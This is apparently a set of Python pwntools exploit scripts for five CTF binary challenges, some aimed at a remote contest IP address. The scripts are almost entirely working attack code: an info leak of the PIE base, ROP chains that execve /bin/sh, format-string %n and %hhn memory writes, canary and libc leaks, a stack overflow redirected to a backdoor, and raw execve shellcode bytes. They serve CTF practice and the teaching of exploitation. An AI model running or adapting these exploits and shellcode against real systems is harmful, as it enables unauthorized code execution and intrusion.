ezpie

from pwn import *
from LibcSearcher import *  # imported but never used in this script
# pwntools context: amd64 Linux target; gdb opens in a Windows Terminal / WSL tab.
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")  # parsed but not referenced below
#libc = ELF('./libc-2.31.so')
io = process("./pwn")  # local run; the remote line below is the contest host, kept disabled
#io = remote("43.249.195.138",22588)
def debug():
    """Attach gdb to the running target and block until the user continues."""
    gdb.attach(io)
    pause()
#debug()
offset = 88  # bytes of filler before the saved return address on the second input
# Leak step: send exactly 40 bytes as the name, then read the 6 bytes the program
# prints right after echoing them. That only works because the name is echoed
# without a terminator, so the adjacent code pointer comes back with it
# (presumably — TODO confirm against the binary).
io.sendafter('your name->','A'*40)
io.recvuntil('A'*40)
a = u64(io.recv(6).ljust(8,b'\x00'))  # 6 significant bytes of an amd64 pointer, zero-extended to 8
print('a\t',hex(a))
base_addr = a - 0x120e # the leaked value is the address of func, at offset 0x120e in the PIE image
print(hex(base_addr))
# Every offset below is relative to the leaked PIE base and specific to this binary build.
main_addr = 0x1254 + base_addr  # computed but never used
pop_rax = 0x00000000000012c8 + base_addr
pop_rdi = 0x0000000000001333 + base_addr
binsh = 0x2008 + base_addr
pop_rsi_r15 = 0x0000000000001331 + base_addr
sys_ret = 0x12C5 + base_addr
# Overflow step: `offset` bytes of cyclic filler, then a return-oriented chain
# through the gadgets above; each p64 after a pop gadget is the value it pops
# (the trailing 0 is the don't-care value for r15).
payload = cyclic(offset)
payload += p64(pop_rax) + p64(0x3b)
payload += p64(pop_rdi)+p64(binsh)
payload += p64(pop_rsi_r15) +p64(0)+p64(0)
payload += p64(sys_ret)
io.sendlineafter('please enter your information-> ',payload)
io.interactive()  # hand the connection over to the user

fmt

from pwn import *
from LibcSearcher import *  # imported but never used in this script
# pwntools context: amd64 Linux target; gdb opens in a Windows Terminal / WSL tab.
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')  # parsed but not referenced below
#io = process('./pwn')
#libc = ELF("")
io = remote("43.249.195.138",20241)  # contest host; as written this script only runs remotely
def debug():
    """Attach gdb to the running target and block until the user continues."""
    gdb.attach(io)
    pause()
#code here
#debug()
# One format-string input (presumably handed to printf as the format — TODO confirm).
# `%8$n` stores the number of bytes printed so far (18) through the pointer found at
# positional argument 8; `%9$n` then stores 18+34 = 52 through argument 9. What those
# arguments point at is challenge-specific and not visible from this script.
payload = b'A'*18+b'%8$n'+b'A'*34+b'%9$n'
io.sendlineafter('>',payload)
io.interactive()  # hand the connection over to the user

stack

from pwn import *
from LibcSearcher import *  # imported but never used in this script
# pwntools context: amd64 Linux target; gdb opens in a Windows Terminal / WSL tab.
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')  # parsed but not referenced below
io = process('./pwn')  # local run; the remote line below is the contest host, kept disabled
#libc = ELF("")
#io = remote("39.106.48.123",36951)
def debug():
    """Attach gdb with a breakpoint on read() and block until the user continues."""
    gdb.attach(io,'b read')
    pause()
#code here
#debug()
# Fixed addresses, so the binary is presumably built without PIE — TODO confirm with checksec.
backdoor_addr = 0x4012E6
pop_rbx = 0x4011bd  # defined but not used in the payload
ret = 0x40101a  # a lone `ret`; presumably there to realign the stack before backdoor_addr — TODO confirm
payload = cyclic(0x1c)
# 0x1c filler bytes, a single 0x1f byte, 8 more filler bytes, then the two return addresses.
payload += b'\x1f'+b'a'*8+p64(ret)+p64(backdoor_addr)
# Declared length is 51 while the payload is 0x1c+1+8+8+8 = 53 bytes and is sent with
# send() (no newline). Whatever the target does with the size value is what lets the
# extra bytes through — not visible here, TODO confirm.
io.sendlineafter('size: ','51')
io.recvuntil('> ')
io.send(payload)
io.interactive()  # hand the connection over to the user

abstract_shellcode

from pwn import *
from LibcSearcher import *  # imported but never used in this script
import time  # imported but never used in this script
from ae64 import AE64  # imported but never called in this script
# pwntools context: amd64 Linux target; gdb opens in a Windows Terminal / WSL tab.
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")  # parsed but not referenced below
io = process("./pwn")  # local run; the remote line below is the contest host, kept disabled
#io = remote("43.249.195.138",22164)
def debug():
    """Attach gdb with a breakpoint at PIE offset 0x14AA and block until the user continues."""
    gdb.attach(io,'b *$rebase(0x14AA)')
    pause()
debug()  # NOTE: unconditional — every run of this script attaches gdb before sending anything

io.recvuntil("input:(ye / no)")
io.send("\x0f\x05")  # what was written here? (author's own note: the reply is two raw bytes, not "ye"/"no")
io.recvuntil("---input your pop code---")
# Mostly-ASCII byte sequence ending in 0x10; how the target interprets it is not visible here.
payload = "["*2+"\\"+"["+"P"*4+"S"+"Z"+"]"*5+"X"+"\x10"
io.send(payload)
# Two filler bytes followed by raw machine-code bytes (left undecoded here).
shellcode = cyclic(0x2)+b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
gdb.attach(io,'b ret')  # second attach on the same process (debug() already attached above); likely a leftover
io.send(shellcode)
io.interactive()  # hand the connection over to the user

fries

from pwn import *
from LibcSearcher import *  # imported but never used in this script
# pwntools context: amd64 Linux target; gdb opens in a Windows Terminal / WSL tab.
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')  # parsed but not referenced below
#io = process('./pwn')
libc = ELF("./libc.so.6")  # challenge-provided libc; symbols and gadgets are looked up in it below
io = remote("43.249.195.138",22948)  # contest host; as written this script only runs remotely
def debug():
    """Attach gdb to the running target and block until the user continues."""
    gdb.attach(io)
    pause()
#code here
#debug()
# Everything below hinges on one defect: each "Go get some fries on the pier" prompt
# presumably passes the input to printf as the format (TODO confirm). The leaks defeat
# ASLR and the stack protector for this process; the later %hhn writes and the final
# overflow reuse the same input path.
io.recvuntil("Emmmmm... Could you give me some fries")
payload = "fries\x00"  # expected first answer, explicitly NUL-terminated
io.send(payload)
# Leak 1: %10$s prints the bytes behind the pointer in positional argument 10; the
# last 6 bytes up to and including the 0x7f high byte are an amd64 libc pointer.
# 0x21a780 is where that pointer sits inside this libc build (build-specific).
io.recvuntil("Go get some fries on the pier")
payload = "%10$s"
io.send(payload)
libc_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x21a780
libc.address = libc_addr  # rebases libc.sym and libc.search results to the running process
success("libc_addr :"+hex(libc_addr))

# Leak 2: %21$p prints argument 21 as "0x" + 12 hex digits (14 chars): a stack address.
# The bare io.recv() drops whatever the program echoes before the value.
io.recvuntil("Go get some fries on the pier")
payload = "%21$p"
io.send(payload)
io.recv()
stack_addr = int(io.recv(14),16)
success("stack_addr :"+hex(stack_addr))

# Leak 3: %23$p, "0x" + 16 hex digits (18 chars): the stack canary.
io.recvuntil("Go get some fries on the pier")
payload = "%23$p"
io.send(payload)
io.recv()
canary = int(io.recv(18),16)
success("canary :"+hex(canary))

# Low 16 bits of a stack slot 0xd0 below the leaked address, split into the two
# bytes written one at a time with %hhn below (low byte + 8 first, high byte second).
buf = (stack_addr & 0xffff)-0xd0
buf1 = (buf &0xff)+0x8
buf2 = buf>>8
success("buf: "+hex(buf))
success("buf1: "+hex(buf1))
# NOTE(review): buf1 is (buf & 0xff) + 8, so it is never 0 and the first branch is
# dead as written — TODO confirm the intent. Also, if (stack_addr & 0xffff) < 0xd0
# then buf and buf2 go negative and the "%<buf2>c" below is malformed; not handled.
if buf1 == 0:
    io.recvuntil("Go get some fries on the pier")
    # Format padded to 8 bytes so the pointer that follows lands where %9$ expects it
    # (the index differs from the else branch, presumably because the padding differs).
    payload = b"%9$hhn".ljust(0x8,b'\x00')+p64(stack_addr-0x50)
    # gdb.attach(io,'b *$rebase(0x12D5)')
    io.send(payload)
    # pause()
else:
    io.recvuntil("Go get some fries on the pier")
    # Print buf1 characters, then %hhn stores the low byte of the running count through
    # the pointer appended after 0x10 bytes of padding (argument 10).
    payload = (b"%"+str(buf1).encode()+b"c"+b"%10$hhn").ljust(0x10,b'\x00')+p64(stack_addr-0x50)
    # gdb.attach(io,'b *$rebase(0x12D5)')
    io.send(payload)
    # pause()

# Second byte: same single-byte write, one address higher, with buf2 as the count.
io.recvuntil("Go get some fries on the pier")
payload = (b"%"+str(buf2).encode()+b"c"+b"%10$hhn").ljust(0x10,b'\x00')+p64(stack_addr-0x50+1)
io.send(payload)

# Gadget and symbol addresses resolved from the rebased libc.
rdi_addr = next(libc.search(asm("pop rdi;ret")))
binsh_addr = next(libc.search(b"/bin/sh"))
system_addr = libc.sym['system']
# Sent twice: the leaked canary, 8 filler bytes, then the three-entry chain.
for i in range(2):
    io.recvuntil("Go get some fries on the pier")
    payload = p64(canary)+cyclic(0x8)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
    # gdb.attach(io,'b *$rebase(0x12D5)')
    io.send(payload)
    # pause()

# Final input: the canary alone.
io.recvuntil("Go get some fries on the pier")
payload = p64(canary)
# gdb.attach(io,'b *$rebase(0x12D5)')
io.send(payload)
# pause()
io.interactive()  # hand the connection over to the user